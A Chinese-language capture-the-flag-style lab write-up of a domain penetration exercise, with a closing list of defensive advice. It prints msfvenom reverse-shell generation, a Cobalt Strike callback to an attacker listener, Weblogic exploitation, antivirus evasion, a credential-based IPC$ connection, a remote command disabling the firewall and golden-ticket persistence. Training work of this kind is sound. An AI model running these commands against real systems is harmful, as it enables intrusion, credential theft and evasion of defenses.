记一次内网渗透靶场学习

字数 1641 2025-08-05 08:19:43

内网渗透靶场学习报告

环境介绍

网络拓扑

Web服务器：
- 外网IP：192.168.10.80
- 内网IP：10.10.10.80
PC主机：
- 外网IP：192.168.10.201
- 内网IP：10.10.10.201
域控制器(DC)：
- 内网IP：10.10.10.10
所有主机处于同一域环境(de1ay.com)中
Weblogic服务需要手动开启

外网渗透阶段

1. 端口探测

使用Nmap进行初步扫描：

nmap -T4 -sC -sV 192.168.10.80

发现关键端口：

1433端口：SQL Server
7001端口：Weblogic

2. Weblogic漏洞利用

访问路径：

http://192.168.10.80:7001/console

尝试弱口令(weblogic/weblogic)失败后，使用漏洞检测工具发现存在多个反序列化漏洞。

利用CVE-2017-10271进行命令执行：

确认权限为administrator
发现双网卡配置，推测存在域环境
发现360主动防御进程运行

3. 上传Webshell

尝试上传JSP马失败(被360拦截)后，改用冰蝎马成功连接。

信息收集发现：

DNS域名：de1ay.com
确认存在域环境

4. MSF上线

生成Meterpreter payload：

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.30 lport=4444 -f exe > msf.exe

初始payload被360拦截，经过混淆处理后成功上线。

内网渗透阶段

1. 内网路由配置

添加内网路由：

route add 10.10.10.0 255.255.255.0 1
route print

设置SOCKS代理：

use auxiliary/server/socks4a
run

2. 内网主机发现

使用UDP探测发现：

10.10.10.10 (推测为域控)
10.10.10.201 (PC主机)

常规Nmap扫描无结果，推测存在防火墙。

3. MS17-010漏洞利用

扫描永恒之蓝漏洞：

use auxiliary/scanner/smb/smb_ms17_010
set rhost 10.10.10.0/24
set threads 5
run

发现两台主机均存在漏洞但利用失败(匿名管道未开启)。

4. MSF派生CS会话

使用payload_inject模块派生会话到Cobalt Strike：

use exploit/windows/local/payload_inject
set PAYLOAD windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.1.5
set LPORT 5555
set SESSION 2
run

CS设置监听(192.168.1.5:5555)成功接收会话。

5. 权限提升

发现当前为user权限，使用systeminfo查看补丁情况：

仅安装3个补丁
使用MS14-058成功提权至system

使用mimikatz导出凭据：

发现SID为500的域管账户
准备进行Pass-the-Hash攻击

6. 横向移动

使用psexec进行横向移动失败(防火墙阻挡)，采取以下步骤：

建立IPC$连接：

net use \\10.10.10.10\ipc$ 1qaz@WSX /user:Administrator
net use

创建计划任务关闭防火墙：

sc \\10.10.10.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\10.10.10.10 start unablefirewall

使用SMB Beacon进行流量中转：

在CS创建SMB Beacon监听
通过psexec上线域控

权限维持

黄金票据攻击

原理：利用krbtgt账户的NTLM Hash伪造TGT，绕过AS验证。

实施步骤：

从域控dump krbtgt的hash值
获取域SID
在Web主机生成黄金票据
验证访问域控资源成功

关键知识点总结

Weblogic漏洞利用：
- CVE-2017-10271反序列化漏洞
- 绕过404访问控制台路径(/console)
- 360防御绕过技术
内网渗透技巧：
- 路由添加与SOCKS代理配置
- 防火墙绕过技术(计划任务关闭)
- 双网卡环境下的渗透思路
横向移动方法：
- MS17-010漏洞利用
- Pass-the-Hash攻击
- SMB Beacon流量中转
权限维持技术：
- 黄金票据攻击原理与实施
- krbtgt账户的重要性
工具使用：
- MSF与Cobalt Strike的协同使用
- 冰蝎与蚁剑的适用场景对比
- 免杀处理技术

防御建议

针对Weblogic：
- 及时安装安全补丁
- 修改默认控制台路径
- 启用强密码策略
内网防护：
- 严格限制SMB协议访问
- 及时修补MS17-010等漏洞
- 禁用不必要的IPC$共享
权限管理：
- 定期更换krbtgt账户密码
- 监控黄金票据生成行为
- 限制域管账户的使用范围
终端防护：
- 保持杀毒软件更新
- 监控异常进程创建
- 限制计划任务创建权限

本报告详细记录了从外网渗透到内网横向移动的全过程，重点突出了在存在安全防护(360)和防火墙环境下的渗透技巧，以及域环境下的权限维持方法。

内网渗透靶场学习报告环境介绍网络拓扑 Web服务器：外网IP：192.168.10.80 内网IP：10.10.10.80 PC主机：外网IP：192.168.10.201 内网IP：10.10.10.201 域控制器(DC) ：内网IP：10.10.10.10 所有主机处于同一域环境(de1ay.com)中 Weblogic服务需要手动开启外网渗透阶段 1. 端口探测使用Nmap进行初步扫描：发现关键端口： 1433端口：SQL Server 7001端口：Weblogic 2. Weblogic漏洞利用访问路径：尝试弱口令(weblogic/weblogic)失败后，使用漏洞检测工具发现存在多个反序列化漏洞。利用CVE-2017-10271进行命令执行：确认权限为administrator 发现双网卡配置，推测存在域环境发现360主动防御进程运行 3. 上传Webshell 尝试上传JSP马失败(被360拦截)后，改用冰蝎马成功连接。信息收集发现： DNS域名：de1ay.com 确认存在域环境 4. MSF上线生成Meterpreter payload：初始payload被360拦截，经过混淆处理后成功上线。内网渗透阶段 1. 内网路由配置添加内网路由：设置SOCKS代理： 2. 内网主机发现使用UDP探测发现： 10.10.10.10 (推测为域控) 10.10.10.201 (PC主机) 常规Nmap扫描无结果，推测存在防火墙。 3. MS17-010漏洞利用扫描永恒之蓝漏洞：发现两台主机均存在漏洞但利用失败(匿名管道未开启)。 4. MSF派生CS会话使用payload_ inject模块派生会话到Cobalt Strike： CS设置监听(192.168.1.5:5555)成功接收会话。 5. 权限提升发现当前为user权限，使用systeminfo查看补丁情况：仅安装3个补丁使用MS14-058成功提权至system 使用mimikatz导出凭据：发现SID为500的域管账户准备进行Pass-the-Hash攻击 6. 横向移动使用psexec进行横向移动失败(防火墙阻挡)，采取以下步骤：建立IPC$连接：创建计划任务关闭防火墙：使用SMB Beacon进行流量中转：在CS创建SMB Beacon监听通过psexec上线域控权限维持黄金票据攻击原理：利用krbtgt账户的NTLM Hash伪造TGT，绕过AS验证。实施步骤：从域控dump krbtgt的hash值获取域SID 在Web主机生成黄金票据验证访问域控资源成功关键知识点总结 Weblogic漏洞利用： CVE-2017-10271反序列化漏洞绕过404访问控制台路径(/console) 360防御绕过技术内网渗透技巧：路由添加与SOCKS代理配置防火墙绕过技术(计划任务关闭) 双网卡环境下的渗透思路横向移动方法： MS17-010漏洞利用 Pass-the-Hash攻击 SMB Beacon流量中转权限维持技术：黄金票据攻击原理与实施 krbtgt账户的重要性工具使用： MSF与Cobalt Strike的协同使用冰蝎与蚁剑的适用场景对比免杀处理技术防御建议针对Weblogic ：及时安装安全补丁修改默认控制台路径启用强密码策略内网防护：严格限制SMB协议访问及时修补MS17-010等漏洞禁用不必要的IPC$共享权限管理：定期更换krbtgt账户密码监控黄金票据生成行为限制域管账户的使用范围终端防护：保持杀毒软件更新监控异常进程创建限制计划任务创建权限本报告详细记录了从外网渗透到内网横向移动的全过程，重点突出了在存在安全防护(360)和防火墙环境下的渗透技巧，以及域环境下的权限维持方法。